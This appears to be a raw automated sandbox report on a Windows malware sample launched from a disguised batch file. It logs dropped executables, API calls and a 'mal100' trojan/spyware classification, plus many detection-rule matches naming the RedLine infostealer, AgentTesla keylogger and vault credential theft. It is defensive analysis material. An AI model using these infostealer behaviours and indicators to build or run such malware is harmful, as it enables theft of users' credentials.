Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 031D89D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 031D894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 031C4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 031C4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 031C44DC appears 74 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: String function: 031A894C appears 50 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: String function: 031946D4 appears 155 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: String function: 03194860 appears 683 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: String function: 031A46D4 appears 155 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: String function: 031A4860 appears 683 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: String function: 031B894C appears 50 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: String function: 0040D606 appears 96 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: String function: 0040E1D8 appears 172 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: String function: 0040FB9C appears 40 times
Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@25/11@3/3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C7FD4 GetDiskFreeSpaceA, 3_2_031C7FD4
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D6DC8 CoCreateInstance, 3_2_031D6DC8
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\CAB06544.TMP Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
Source: C:\Users\Public\Libraries\xrbjyllC.pif Command line argument: 08A 9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Command line argument: 08A 9_2_00413780
